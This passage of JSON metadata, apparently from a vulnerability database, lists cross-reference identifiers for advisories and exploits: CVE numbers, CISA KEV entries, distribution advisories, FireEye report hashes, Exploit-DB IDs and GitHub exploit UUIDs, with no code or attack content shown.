"CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2018-0802", "CISA-KEV-CVE-2021-40444", "CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2022-22047", "CISA-KEV-CVE-2022-2294", "CISA-KEV-CVE-2022-30190", "CISA-KEV-CVE-2022-3075", "CISA-KEV-CVE-2022-34713", "CISA-KEV-CVE-2022-37969", "CISA-KEV-CVE-2022-41040", "CISA-KEV-CVE-2022-41082"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cnvd", "idList": ["CNVD-2021-101661", "CNVD-2021-69088", "CNVD-2022-01776", "CNVD-2022-56255", "CNVD-2022-63613", "CNVD-2022-63618", "CNVD-2022-67837", "CNVD-2022-67838"]}, {"type": "cve", "idList": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0802", "CVE-2021-3100", "CVE-2021-40444", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-0070", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-23848", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-33915", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-41040", "CVE-2022-41082"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DLA-2852-1:37D89", "DEBIAN:DLA-2870-1:54673", "DEBIAN:DLA-3080-1:B56BE", "DEBIAN:DLA-3097-1:4D7FE", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5024-1:FE296", "DEBIAN:DSA-5180-1:E631C", "DEBIAN:DSA-5201-1:65774", "DEBIAN:DSA-5217-1:1B0C4", "DEBIAN:DSA-5221-1:C92C5", "DEBIAN:DSA-5225-1:927E5"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-44832", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2021-45105", "DEBIANCVE:CVE-2022-2294", "DEBIANCVE:CVE-2022-2295", "DEBIANCVE:CVE-2022-2624", "DEBIANCVE:CVE-2022-3075", "DEBIANCVE:CVE-2022-38476", "DEBIANCVE:CVE-2022-38477", "DEBIANCVE:CVE-2022-38478"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:50590", "EDB-ID:50592"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "f5", "idList": ["F5:K14122652", "F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K34162192"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:16ADB302CDBA", "FEDORA:1AA1C30A3C1B", "FEDORA:29E5830A072A", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:63A16302C983", "FEDORA:7DC2630AEB07", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:C6FE430979BC", "FEDORA:E468830AF07B"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "744EC9D7-FE0F-11EC-BCD2-3065EC8FD3EC", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "96A41723-133A-11ED-BE3B-3065EC8FD3EC", "B0F49CB9-6736-11EC-9EEA-589CFC007716", "D1BE3D73-6737-11EC-9EEA-589CFC007716", "F38D25AC-2B7A-11ED-A1EF-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202208-35", "GLSA-202208-37", "GLSA-202208-38", "GLSA-202208-39", "GLSA-202209-23"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-8489-44MV-GGJ8", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-P6XC-XR62-6R2G", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "02390955-9697-5950-8297-164CBB7695F0", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "04705DD0-6F67-5847-B368-4ADB734EC12B", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "0990FE6E-7DC3-559E-9B84-E739872B988C", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A2301E7-88D2-55E7-BB5D-7889B2D2ACFD", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C734DE8-002A-5611-8897-213D53D85089", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "111C9F44-593D-5E56-8040-615B48ED3E24", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "160565AA-2CBF-5AAB-B074-9EFDCD7B0D9D", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "17DBAF5D-D221-53A1-8663-721B510E680E", "1840A140-1CD9-55F2-A8BD-9B7B27779956", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "1FD14DF4-7723-5B40-A7BA-4E86B6E51603", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "221070D3-0B31-5CF7-A508-B4740B63647B", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24DE1902-4427-5442-BF63-7657293966E2", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26905C55-5DC7-5275-A0AF-FAF06685612E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "2DFE744C-4369-56D5-9FEA-348B4150C298", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "30F42F9A-5E27-592E-BE65-B85DC7E22075", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "3410A018-A761-5411-8E58-892F756D299A", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3722FF3F-D30D-5D5C-802E-EEA4963C6848", "3734D8ED-657E-5585-B181-DE9BE2D84456", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "37F78533-E96A-5433-B558-90DB82C0BB27", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "39D1AD81-7117-5EA3-8421-A33979B77F49", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D2CC855-C8BA-5DC6-8C78-D67984FBA93F", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4DC6D6A4-F23D-5A3D-98B8-3BB526D28144", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "56417A88-33CB-520F-8FC3-4F3E49561DDC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "59A6FBED-4F3E-5B1E-87FF-E637492A268A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5B74BEF9-0D39-5A60-8806-ABA55730878C", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5C16D945-0879-5E51-B2AF-B106F633656A", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D652B55-850E-5043-96F0-43DE64B98D34", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "604B2FE5-9DF8-5C70-878D-2CCFAA39A6C1", "6064317C-299E-530F-81F1-F80C282AE68A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "66903BCE-DCE3-5FB9-B078-75CC2AD46662", "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "675E960A-9F2E-5575-8C21-8528492BE5C6", "6776EABD-28C1-5A42-8AB2-27BD7F492078", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6AF23F99-AE40-5899-AD81-AE3F71760F38", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6E208382-5651-5649-B6C1-F9EF3A08EA81", "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70407390-C149-54F1-89B0-7611FB420601", "70582B5B-E1E6-5767-94A6-39740A96A052", "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "70EDCB3B-9053-5056-980C-AC3123913F04", "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "743571E7-B8EE-5E77-B047-E2E001379ACE", "74A4D09D-9483-5842-A44A-9DA17D085AF5", "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "75180259-16B4-5B60-9913-BFC9A306560A", "75389328-1B05-5056-B8C0-C624BF0343AD", "75876A50-BD9B-5991-9E42-7A343A97C890", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C8BD924-02A0-5873-B8AF-445DE0103959", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7D82EDFA-5384-53C5-96AD-A99E88471129", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "8516D742-8A1C-521C-8372-26BA9FBA2200", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87179042-CF32-5495-87D0-B916B42259D2", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "88F20430-F65B-520C-880E-FB9413D8C14F", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "938D4200-A40C-5294-A146-4DF378B29573", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "9529CA86-8F3A-503D-9D02-94AC19D0CDD4", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "9905FF79-0EE2-5313-9486-DA71B70A3D88", "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C874FAC-8640-5978-8C60-AF6528E5DF60", "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A304CD7E-97E7-577B-91FF-D46A42433CD9", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A78746B7-318B-5981-A2EB-2D5BA5C26514", "A8E3F65D-BE00-5E3F-BD91-A0A5A8692D4E", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB5B35BD-2A55-5B27-A126-0CF1A7E7B145", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "AFC5A984-3296-5D6A-AE73-0771AF4EDAF6", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B13A8262-323C-5D9D-BA90-C5D9C3816AE8", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B2474BAA-4133-5059-8F0B-5BAAE9664466", "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8464218-31FA-569A-AC74-26B347DEC285", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9A69678-D96F-528D-B436-366259B4A283", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BAA0F684-952E-5B9E-B207-0419A33AC53B", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", 